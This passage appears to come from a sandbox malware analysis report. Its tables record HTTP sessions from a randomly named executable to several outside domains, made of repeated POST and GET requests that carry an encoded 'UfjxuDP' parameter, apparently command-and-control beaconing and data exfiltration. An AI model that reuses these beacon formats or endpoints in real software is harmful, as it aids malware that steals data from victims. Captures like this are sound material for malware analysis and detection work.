3 | 192.168.2.7 | 49972 | 104.21.28.65 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:15:12.800743103 CET | 1792 | OUT | POST /9fei/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                Origin: http://www.binjai77rtp11f.xyz
                                                                Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Jan 11, 2025 09:15:13.352886915 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 08:15:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qeIWRfJAmhSDtIZvz8SQLywQZRTVlSYQMg%2FUKbjx5SAdFZI7L3rer%2FrvdLharxti3%2FPymx8vURe5%2B9tEPQElG40IrhqmZgP1An1yUQGx7wjmoU6aaMNsmnkXHoSGm%2FjuTs4sFKETbAcj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003752b8a83434b-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.7 | 49973 | 104.21.28.65 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:15.340862989 CET | 493 | OUT | GET /9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:15.890052080 CET | 790 | IN | HTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 08:15:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rN%2BFpvuTL0KvpMcripo3s3FGI6QHfvYyyROQu3%2FYtWM69Z0OZRN0i7sdMB0quMzzM9fzf3QAvdDwRviiaSR7Erm6s%2BkU40CmrDQVoY8lENXx%2FHZ%2F%2F%2BofLy5SJihynKUb4H2w0GZXFaE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003753b6dfa42e1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.7 | 49974 | 104.21.54.126 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:21.575131893 CET | 750 | OUT | POST /wmxx/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                Origin: http://www.vietnamtour.pro
                                                                Referer: http://www.vietnamtour.pro/wmxx/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Ascii: UfjxuDP=+fxjh23YXcyEmfSri+2ETkKAoRB/wt3hfV9q3wwVr/oMwf2FVqhWtinJe9xQNL5Jx/xQ1xcuQQqWMGDYa0bVrf0maCXQbhIRnxP5MLmX9Q2V024s2uB0ojSlTC4XLMJZU325qOJsjpWVc9bwVpbIBx91GZrb6t9BGW/1GVe1Hi9aJIUlSJV4sjRRS0710Q7/JmtG6/AER+fchHlhaQ==
                                                                Jan 11, 2025 09:15:22.541867018 CET | 1072 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:22 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhmK1dnqVnfyq5aJbyYsza9fBEJpRFIBmXHgxQeOs8dqAZmfYb0cnS8dnevgd9h0l%2FEZuPM5Dc%2BwWRJ4qzyOqGzqP2XjGs0Wyfq38UiEEmatRyfc%2FHpqM%2Ff2iUVpS4bAdCfkyBx8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003756259cac340-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=750&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.7 | 49975 | 104.21.54.126 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:24.126991034 CET | 770 | OUT | POST /wmxx/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                Origin: http://www.vietnamtour.pro
                                                                Referer: http://www.vietnamtour.pro/wmxx/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Ascii: UfjxuDP=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMMMp9uFUrhWgCnJKtxVSb5Cx/8j1zYuQUCWMHzYaFbW5/0eRiXeWBIRnxP5MIb89Q+V1HIs3PBrkDSkFS4Xc8JdU32bqLpKjquVc/zwV4bHIx8+J5rJ78EkMlTSLU+BCi9ZI+VHIrZUyypqW2fDj2mKLnpe3d0lOJ62sVElMtQ3hDtre2Loha25NwKBozI=
                                                                Jan 11, 2025 09:15:25.062391043 CET | 1077 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:25 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2B%2BsNP4R2rXPPTih9atHetgOyZEeLPpa4h2uXX%2Fz%2BB65laYJjzA2DLGRl1WU%2Ffnhl78pBAyn%2BcV7uAfMkz2sks%2FH%2B8abK9WlQZTxgUmq8lbafe6h%2FB1ILkfvlXNKDDi20cgomD3G"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 900375724bb77d0c-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1762&rtt_var=881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.7 | 49976 | 104.21.54.126 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:26.762778997 CET | 1783 | OUT | POST /wmxx/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                Origin: http://www.vietnamtour.pro
                                                                Referer: http://www.vietnamtour.pro/wmxx/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:27.724517107 CET | 1078 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:27 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt6%2BNoCY9U9KgyiTT1zFjUOofyHBp9vV3hQ6MQIlrWuuKkS%2FcVbw6YziiIeZuv5dSdpAx0V%2BIsF%2BzujYeaqfipiZHCVnSgvUka2HDBqcm%2FeOWGrmfI6IcrIPo8Fau94mWfia7Q%2BD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90037582be338c11-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2202&min_rtt=2202&rtt_var=1101&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.7 | 49977 | 104.21.54.126 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:29.307890892 CET | 490 | OUT | GET /wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:30.354145050 CET | 1081 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:30 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5Ag3I6hRcgGnCeekoCmTi1rzssAshuX5EPjkVArFLfYIBkG5s0TcstoxpPDHypKtTby9HKPMeqkovTfwo%2BVrT4x3F9txp9%2FUPiRPT6GVgzmsCEohSOns1F6x7Tb4TcBndNAAGvI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90037592c9047cb4-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1918&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=490&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.vietnamtour.pro Port 80</address></body></html>0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.7 | 49978 | 69.57.163.64 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:36.197618008 CET | 756 | OUT | POST /zbqa/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                Origin: http://www.showyourstyle.top
                                                                Referer: http://www.showyourstyle.top/zbqa/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 76 72 67 58 6f 68 4e 72 59 31 38 46 42 54 7a 58 77 61 57 34 73 79 71 63 78 2b 6a 70 59 56 32 4c 46 62 30 74 59 72 4f 66 76 77 7a 6a 62 41 54 72 36 61 66 39 64 4b 63 63 49 4e 54 6f 38 59 65 70 38 68 78 56 47 42 48 75 67 35 55 79 4b 39 47 41 41 6f 65 49 36 4c 50 32 34 42 6a 45 53 68 65 58 47 6f 74 52 62 61 36 31 56 56 4e 67 4d 66 50 6d 51 67 58 32 34 4a 76 4a 4d 62 68 56 46 36 68 38 39 37 2b 32 6b 32 61 69 75 4e 33 53 7a 76 61 35 62 52 62 6f 54 70 75 4f 79 41 56 74 4e 35 58 48 36 47 6d 76 6f 4a 4f 74 43 6e 4e 63 6e 42 41 47 4b 33 6e 47 44 38 65 50 4c 73 79 73 71 53 4a 37 4b 32 39 38 67 3d 3d
                                                                Data Ascii: UfjxuDP=YJXb98DVW6x1mvrgXohNrY18FBTzXwaW4syqcx+jpYV2LFb0tYrOfvwzjbATr6af9dKccINTo8Yep8hxVGBHug5UyK9GAAoeI6LP24BjESheXGotRba61VVNgMfPmQgX24JvJMbhVF6h897+2k2aiuN3Szva5bRboTpuOyAVtN5XH6GmvoJOtCnNcnBAGK3nGD8ePLsysqSJ7K298g==
                                                                Jan 11, 2025 09:15:36.803406954 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:36 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.7 | 49979 | 69.57.163.64 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:38.751606941 CET | 776 | OUT | POST /zbqa/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                Origin: http://www.showyourstyle.top
                                                                Referer: http://www.showyourstyle.top/zbqa/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 50 62 67 56 50 31 4e 36 34 31 37 41 42 54 7a 59 51 61 53 34 73 2b 71 63 77 36 7a 71 71 68 32 4c 6b 4c 30 75 5a 72 4f 50 2f 77 7a 33 4c 41 57 6f 4b 61 75 39 64 32 55 63 4d 52 54 6f 38 63 65 70 34 6c 78 56 58 42 45 38 41 35 57 6e 61 38 67 66 51 6f 65 49 36 4c 50 32 34 6b 4f 45 53 35 65 58 79 55 74 52 36 61 35 38 31 56 43 6e 4d 66 50 33 41 67 4d 32 34 4a 4e 4a 4e 57 70 56 47 53 68 38 38 4c 2b 32 78 61 5a 33 2b 4e 39 57 7a 75 64 77 49 6b 45 6e 41 4d 51 47 67 4e 50 79 2b 6b 7a 47 4d 48 45 31 4b 46 69 7a 54 66 32 59 6c 6c 32 52 73 71 53 45 43 34 47 43 70 59 54 7a 64 33 6a 32 59 58 35 71 56 64 55 73 67 57 62 6b 69 33 37 4c 74 6d 57 77 62 6e 74 38 66 55 3d
                                                                Data Ascii: UfjxuDP=YJXb98DVW6x1mPbgVP1N6417ABTzYQaS4s+qcw6zqqh2LkL0uZrOP/wz3LAWoKau9d2UcMRTo8cep4lxVXBE8A5Wna8gfQoeI6LP24kOES5eXyUtR6a581VCnMfP3AgM24JNJNWpVGSh88L+2xaZ3+N9WzudwIkEnAMQGgNPy+kzGMHE1KFizTf2Yll2RsqSEC4GCpYTzd3j2YX5qVdUsgWbki37LtmWwbnt8fU=
                                                                Jan 11, 2025 09:15:39.336935043 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:39 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.7 | 49980 | 69.57.163.64 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:41.297291994 CET | 1789 | OUT | POST /zbqa/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                Origin: http://www.showyourstyle.top
                                                                Referer: http://www.showyourstyle.top/zbqa/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 50 62 67 56 50 31 4e 36 34 31 37 41 42 54 7a 59 51 61 53 34 73 2b 71 63 77 36 7a 71 71 35 32 4b 55 58 30 74 36 7a 4f 64 76 77 7a 6f 37 41 58 6f 4b 61 7a 39 64 65 51 63 4d 63 6d 6f 2b 55 65 71 62 74 78 43 56 35 45 6c 77 35 57 6c 61 38 30 41 41 6f 50 49 36 62 4c 32 34 30 4f 45 53 35 65 58 30 77 74 59 4c 61 35 2b 31 56 4e 67 4d 66 54 6d 51 68 43 32 34 42 33 4a 4e 43 35 4a 6d 79 68 38 63 62 2b 31 44 69 5a 32 65 4e 7a 52 7a 75 2f 77 49 34 68 6e 41 52 68 47 69 73 59 79 38 30 7a 48 4a 79 43 6e 5a 6c 56 6f 54 66 6f 53 6b 52 74 61 66 4b 39 4a 55 38 36 44 37 55 64 76 4b 48 5a 2f 70 4c 73 6a 46 52 53 78 7a 53 54 69 6a 71 33 4e 62 33 39 68 71 4c 4e 2b 62 6e 74 32 6f 7a 63 35 6a 4c 2b 4c 55 50 4e 44 72 4e 76 6d 64 78 61 4a 65 54 67 70 73 37 52 47 58 68 58 2f 67 45 4f 54 2f 4d 58 59 49 4d 61 49 6f 2b 4e 4d 6f 34 46 31 7a 62 2b 49 4b 51 45 6a 46 38 38 4d 38 44 55 34 7a 76 67 64 58 57 62 45 73 73 2f 6e 5a 4f 4b 76 62 34 33 42 74 4f 63 30 4c 52 76 2f 32 [TRUNCATED]
                                                                Data Ascii: UfjxuDP=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 [TRUNCATED]
                                                                Jan 11, 2025 09:15:41.881556034 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:41 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.7 | 49981 | 69.57.163.64 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
